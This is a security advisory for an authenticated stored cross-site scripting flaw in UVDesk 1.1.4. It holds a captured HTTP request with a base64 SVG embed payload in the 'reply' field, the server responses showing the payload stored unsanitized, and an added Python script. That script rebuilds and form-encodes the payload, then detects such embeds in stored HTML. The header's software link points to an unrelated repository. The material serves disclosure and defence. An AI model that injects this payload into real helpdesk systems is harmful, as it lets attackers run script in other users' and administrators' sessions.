
UVDesk 1.1.4 - Stored XSS (Authenticated)

# Exploit Title: UVDesk 1.1.4 - Stored XSS (Authenticated)
# Date: 14/08/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.uvdesk.com/
# Software Link: https://github.com/megatkc/aerocms
# Version: 1.1.4
# Tested on: Windows 10 with XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
# Authenticated user privileges are required. A user can deliver the XSS to an administrator or to other users and steal their sessions.
## Example: XSS stored in a new ticket
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Parameter: reply
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Request:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 812
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxcjjcgbgzxzzwlssk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: uv-pol=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
Connection: close

------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="threadType"

forward
------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="status"


------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="subject"

AAAA
------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="to[]"

[email protected]
------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="reply"

%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryxcjjcgbgzxzzwlssk
Content-Disposition: form-data; name="nextView"

stay
------WebKitFormBoundaryxcjjcgbgzxzzwlssk--
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Response:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Mon, 14 Aug 2023 11:33:26 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: max-age=0, must-revalidate, private
Location: /uvdesk/public/en/member/ticket/view/1
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS
Access-Control-Allow-Headers: Access-Control-Allow-Origin
Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Headers: Content-Type
X-Debug-Token: bf1b73
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
X-Robots-Tag: noindex
Expires: Mon, 14 Aug 2023 11:33:26 GMT
Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5C...%5C%5Cuvdesk%5C%5Cvendor%5C%5C...%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 398

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />

        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>
    </head>
    <body>
        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.
    </body>
</html>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Following the redirect and viewing the ticket, the response is:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2023 11:44:14 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: max-age=0, must-revalidate, private
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS
Access-Control-Allow-Headers: Access-Control-Allow-Origin
Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Headers: Content-Type
X-Debug-Token: 254ce8
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
X-Robots-Tag: noindex
Expires: Mon, 14 Aug 2023 11:44:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 300607

<!DOCTYPE html>
<html>

<title>#1 vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv</title>
[...]
<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>
[...]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The XSS executes when the ticket thread is rendered, so replying on a victim's ticket delivers the payload to that user. The same payload can be used in new articles, new tickets and elsewhere in the application. Note that the PoC's alert() proves the stored markup reaches the browser unsanitized; because browsers give a document loaded from a data: URI an opaque origin, this particular SVG embed cannot read the helpdesk's cookies itself, and a session-stealing payload needs script that runs in the page's own origin.
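As an added illustration (example code written for this page, not part of the advisory or of UVDesk), the script below rebuilds the advisory's payload from its plaintext SVG, form-encodes it the way the captured request does, and then applies the check a defender would run over stored thread HTML: locate embed/object/iframe elements whose source is a base64 SVG data: URI, decode the SVG, and flag it when it carries script or event-handler content. The function names (build_embed, form_encode_reply, find_scripted_svg_embeds) are my own, and the benign SVG used as a negative case is constructed for the example.

```python
import base64
import re
import urllib.parse

# Added example for this page; not code from the advisory or from UVDesk.
# SVG_SCRIPT is the plaintext of the base64 document inside the advisory's
# payload: a <script> carried by an SVG that is rendered through <embed>.
SVG_SCRIPT = (
    '<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" '
    'width="194" height="200" id="xss">'
    '<script type="text/ecmascript">alert("XSS");</script></svg>'
)


def build_embed(svg=SVG_SCRIPT):
    """Return the <p><embed ...></embed></p> fragment that the advisory stores
    through the 'reply' field. The SVG travels base64-encoded in a data: URI,
    so a filter that only greps the stored HTML for '<script' misses it."""
    b64 = base64.b64encode(svg.encode("utf-8")).decode("ascii")
    return (
        f'<p><embed src="data:image/svg+xml;base64,{b64}" '
        f'type="image/svg+xml" width="300" height="150"></embed></p>'
    )


def form_encode_reply(fragment):
    """Encode the fragment as the browser did in the captured multipart body
    (URL-encoding with '+' for spaces), e.g. for replaying with an HTTP client."""
    return urllib.parse.quote_plus(fragment)


# Elements that render a sub-document, pointing at a base64 SVG data: URI.
DATA_URI_SVG = re.compile(
    r'<(?:embed|object|iframe)\b[^>]*?\b(?:src|data)\s*=\s*["\']?'
    r'data:image/svg\+xml;base64,([A-Za-z0-9+/=]+)',
    re.IGNORECASE,
)

# Active content inside the decoded SVG: <script>, on* handlers, javascript: links.
ACTIVE_CONTENT = re.compile(
    r'<script\b|\bon[a-z]+\s*=|\bhref\s*=\s*["\']?\s*javascript:',
    re.IGNORECASE,
)


def find_scripted_svg_embeds(stored_html):
    """Scan stored thread HTML (for instance the thread bodies of one ticket
    pulled from the database) and return the decoded SVG documents that carry
    active content. Malformed base64 is skipped, not reported as a finding."""
    findings = []
    for match in DATA_URI_SVG.finditer(stored_html):
        try:
            svg = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        if ACTIVE_CONTENT.search(svg):
            findings.append(svg)
    return findings


if __name__ == "__main__":
    payload = build_embed()
    print(form_encode_reply(payload))
    # Constructed thread HTML: a harmless inline SVG followed by the advisory's payload.
    harmless = build_embed('<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>')
    for svg in find_scripted_svg_embeds("<p>Hello</p>" + harmless + payload):
        print("scripted SVG embed:", svg[:60], "...")
```

The decode step is the part that matters: the stored HTML contains no literal `<script`, only an opaque base64 string, so any review of thread bodies has to unwrap data: URIs before looking for active content, and the fix on the application side is to drop embed/object/iframe (or at least data: sources) from the rich-text allow-list rather than to pattern-match the encoded payload.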
 